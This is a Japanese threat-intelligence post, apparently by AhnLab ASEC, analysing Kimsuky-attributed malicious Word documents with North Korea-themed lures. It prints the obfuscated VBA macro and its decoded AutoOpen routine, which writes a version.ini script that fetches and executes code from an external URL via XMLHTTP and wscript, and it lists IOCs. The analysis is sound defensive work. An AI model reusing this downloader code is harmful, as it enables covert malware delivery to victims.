ASEC 分析チームは、対北朝鮮に関するファイル名で不正な Word ドキュメントが継続的に拡散していることを確認した。
Word ドキュメントには不正な VBA マクロコードが含まれており、<対北朝鮮に関する本文内容を含む不正な Word の持続的な拡散を確認>において紹介したドキュメントファイルと同じタイプであると確認できる。最近拡散が確認された Word ドキュメントのファイル名は以下の通りである。
- 220426-北朝鮮の外交政策と我が国の対応方向(チョン・**博士).doc(4/26)
- 北朝鮮の外交政策と我が国の対応方向.doc(4/26)
- 中国の外交政策と我が国の対応方向.doc(4/22)
- 報道資料-ONE KOREA 国際フォーラム 2022 -20220422.docm(4/23)
- [分析資料] 4.25 観兵式から見る北朝鮮の核武力使用の立場と軍部エリート変動の含意.docm(4/26)
確認されたマクロコードには特定の URL に接続して受け取ったデータを実行するコードが含まれている。「北朝鮮の外交政策と我が国の対応方向.doc」ファイルにおいて確認されたマクロコードには、以下のように難読化された文字列が存在する。
Function Unpck(idx)
sa = Array("pi^c$", "wi^n$m~g^mts^:w^in@3^2_$pro~ces`s", "1q^a$z~2^wsx^", "On^ $E~r^ror^ R^es@u^me$ Ne~xt:`Set@ m@x $= ^Cr^ea`teO`b`je~ct^(`""~Mi^cro^so~ft$.X`MLH$TT`P""~):`mx^.op$en@ ""`GE@T`"",` ^""~h^tt`p:/$/g0`0gl`edr^iv^e`.^myw@eb^com`mu~nit$y@.o~rg`/f^il~e~/up^lo`ad^/li`st$.p`h^p?$qu`ery$=^1""~, F$al@se~:mx$.S`end@:$Ex$e@cu`te(`mx.^re$spo`ns~eT`ex^t)", "\v^e$r~s^ion^.i^ni@", "ws^c$r~i^pt.^ex^e @/^/e$:vb~scr`ipt@ /@/b$ ")
Key = "@ $ ~ ` ^"
s = sa(idx)
arrkey = Split(Key)
For Each k In arrkey
s = Replace(s, k, "")
Next
Unpck = s
End Function難読化された文字列は Word ドキュメントを開くと自動で実行される AutoOpen() 関数により使用され、デコードされた文字列は以下の通りである。
Sub AutoOpen()
On Error Resume Next
sn = Denor(0) 'pic
Set wm = GetObject(Denor(1)) 'winmgmts:win32_process
pw = Denor(2) '1qaz2wsx
Weed sn, pw
Present
Set wnd = ActiveDocument
wnd.Save
cnt = Denor(3) 'On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "hxxp://g00gledrive.mywebcommunity[.]org/file/upload/list.php?query=1", False:mx.Send:Execute(mx.responseText)
pth = Templates(1).Path & Denor(4) '\version.ini
ResContent pth, cnt
wm.Create Denor(5) & pth 'wscript.exe //e:vbscript //b
End Subこのマクロにも<対北朝鮮に関する本文内容を含む不正な Word の持続的な拡散を確認>で確認されていた文書保護の解除に関連するコードが存在する。設定されたパスワードも 1qaz2wsx を使用しており、同じ攻撃者が製作したものと推定される。
以後、%AppData%\Microsoft\Templates\ フォルダーに version.ini ファイルを生成する。ini ファイルの内部には以下のように特定の URL から受け取ったデータを実行するコマンドが含まれている。接続先 URL に list.php?query=1 が含まれている点も、このタイプの特徴である。
On Error Resume Next:
Set mx = CreateObject("Microsoft.XMLHTTP"):
mx.open "GET", "hxxp://g00gledrive.mywebcommunity[.]org/file/upload/list.php?query=1", False:
mx.Send:
Execute(mx.responseText)生成された ini ファイルは以下のコマンドによって実行される。
- wscript.exe //e:vbscript //b %AppData%\Microsoft\Templates\version.ini
現在は URL に接続が不可能なため以降の振る舞いは確認できないが、wscript.exe の実行引数が<炭素排出専門企業をターゲットにした Word ドキュメントによる攻撃>で確認されたコマンドと同じことからして、これと同じくユーザー PC の情報流出等の振る舞いが実行されたであろうと推定される。
このマルウェアを製作しているものと推定される攻撃グループは、対北朝鮮に関する内容で不正な Word ドキュメントの配布を続けており、これらの内容に関連するユーザーは注意が必要である。ユーザーは出どころが不明な電子メールの添付ファイルの実行およびマクロの有効化を行わないようにしなければならない。
現在 V3 では、このマルウェアを以下のように検知している。
[ファイル検知]
Downloader/DOC.Kimsuky
[IOC]
657b538698483f43aada2e5e4bc4a91d (VBA)
cb2a18028055cdf1582c1c5ac3756203 (VBA)
0a0f858beeb6914aaf07896b7790a1d4 (VBA)
hxxp://g00gledrive.mywebcommunity[.]org/file/upload/list.php?query=1
hxxp://impartment.myartsonline[.]com/file/upload/list.php?query=1
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報
[…] Kimsuky 攻撃ワード(word)ドキュメント事例総整理解析レポート」および「外交/安全保障関連の内容の Word ドキュメントが拡散中」において共有した Word ドキュメントのタイプと併せて、mshta […]